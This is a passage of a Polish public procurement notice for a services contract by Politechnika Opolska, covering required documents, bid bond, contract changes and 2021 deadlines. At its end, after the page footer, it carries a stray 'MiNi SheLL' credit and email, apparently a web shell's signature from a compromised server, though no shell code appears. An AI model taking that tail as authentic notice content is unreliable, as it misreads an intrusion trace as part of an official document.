podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do<br/>wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 i nr 3 do SWZ;2. Informacje zawarte w<br/>oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.3. Zamawiający wzywa wykonawcę, którego<br/>oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o<br/>zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych.4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują: Wykazu usług -<br/>sporządzonego zgodnie z załącznikiem nr 6 do SIWZ, wykonanych nie wcześniej niż w okresie<br/>ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów,<br/>na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi<br/>zostały wykonane należycie, w szczególności informacji o tym czy usługo zostały wykonane zgodnie z regulacjami prawnymi, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne<br/>dokumenty.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z<br/>ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>3) dowód wniesienia wadium<br/>4) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli<br/>dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 3<br/>000,00 złotych (słownie: trzy tysiące złotych 00/100);2. Wadium wnosi się przed upływem<br/>terminu składania ofert.3. Wadium może być wnoszone w jednej lub kilku następujących<br/>formach:1) pieniądzu; 2) gwarancjach bankowych;3) gwarancjach ubezpieczeniowych;4)<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9<br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r.<br/>poz. 299).4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku PKO S.A.<br/>nr rachunku 74 1240 1633 1111 0010 0525 5655 z dopiskiem „Wadium w postępowaniu<br/>ZS/2/2021-B”.UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty<br/>termin<br/>uznania rachunku Zamawiającego.5. Wadium wnoszone w formie poręczeń lub gwarancji musi<br/>być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co<br/>najmniej poniższe wymagania:1) musi obejmować odpowiedzialność za wszystkie przypadki<br/>powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p. 2) z jej treści powinno<br/>jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;3) powinno być<br/>nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;4) termin obowiązywania<br/>poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert); 5) w treści poręczenia lub<br/>gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;6)<br/>beneficjentem poręczenia lub gwarancji jest: Politechnika Opolska. 7) w przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy p.z.p.),<br/>Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych<br/>z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);6. Oferta wykonawcy, który nie<br/>wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w<br/>przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy p.z.p. zostanie odrzucona.7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści<br/>wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy p.z.p. oraz wskazanym we<br/>Wzorze Umowy, stanowiącym Załącznik nr 8 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://po-opole.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz<br/>poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów<br/>Ustawy,<br/>przysługują środki ochrony prawnej określone w dziale IX Ustawy.2.Wykonawca może w celu<br/>potwierdzenia spełniania warunków udziału w polegać na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych.3. Wykonawca, który polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Wzór oświadczenia stanowi załącznik nr 4 do SWZ.4. Osobą uprawnioną do porozumiewania<br/>się<br/>z Wykonawcami jest: mgr Agnieszka Zyzik, tel. 77/4498178, email:a.zyzik@po.edu.pl.5.<br/>Wszystkie koszty związane z uczestnictwem w postępowaniu, w szczególności z<br/>przygotowaniem i złożeniem oferty ponosi Wykonawca składający ofertę. Zamawiający nie<br/>przewiduje zwrotu kosztów udziału w postępowaniu.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com